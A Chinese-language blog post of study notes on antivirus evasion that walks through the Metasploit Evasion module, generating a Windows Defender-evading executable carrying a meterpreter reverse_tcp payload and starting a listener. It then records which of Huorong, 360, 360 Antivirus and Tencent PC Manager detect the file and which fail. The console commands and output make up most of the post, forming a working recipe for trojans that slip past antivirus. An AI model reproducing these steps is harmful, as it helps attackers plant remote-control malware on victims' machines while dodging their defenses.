最近开始学习免杀,发现Tide团队有免杀的系列文章,先膜拜一波大佬,这里的博客是复现和学习的笔记,如果你对内容感兴趣可以学习参考链接里提供的地址
实验环境
为避免木马被杀导致别的平台没有机会检测,实验时会每次只启动一个杀软,然后截图,最后把关于这个木马的截图汇成一张图
选择的是当下最新版本的火绒、360、360杀毒、腾讯电脑管家,版本如下:
火绒:5.0.55.2
腾讯电脑管家:13.6.20672.243
360:12.0.0.2003
360杀毒:50.0.8170(64位)
前言
2019年1月,metasploit升级到了5.0,引入了一个新的模块叫Evasion模块,官方宣称这个模块可以创建反杀毒软件的木马。
evasion有以下几个模块,可以使用show evasion进行查看。
defender(VT查杀率42/69)
使用use windows/windows_defender_exe进行生成payload
msf5 > use windows/windows_defender_exe
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > show options
Module options (evasion/windows/windows_defender_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME DQPpQq.exe yes Filename for the evasive file (default: random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.239.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Evasion target:
Id Name
-- ----
0 Microsoft Windows
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
filename => payload.exe
msf5 evasion(windows/windows_defender_exe) > run
[*] Compiled executable size: 4096
[+] payload.exe stored at /root/.msf4/local/payload.exe
MSF开启监听
handler -H 192.168.239.129 -P 4444 -p windows/meterpreter/reverse_tcp
关闭杀软的情况下,可以正常上线
开启杀软
火绒、360杀毒静态可杀,360动态可杀,腾讯电脑管家失败
hta(VT查杀率26/61)
生成payload
开启监听
没有杀软的情况下可以正常上线
开启杀软的情况下
腾讯电脑管家静态可杀,360、360杀毒、火绒失败
双击运行程序的时候,火绒和360报毒,360杀毒失败
其他
evsion共有7个模块,但是其他几个好像还需要后续加工一下,暂时略过
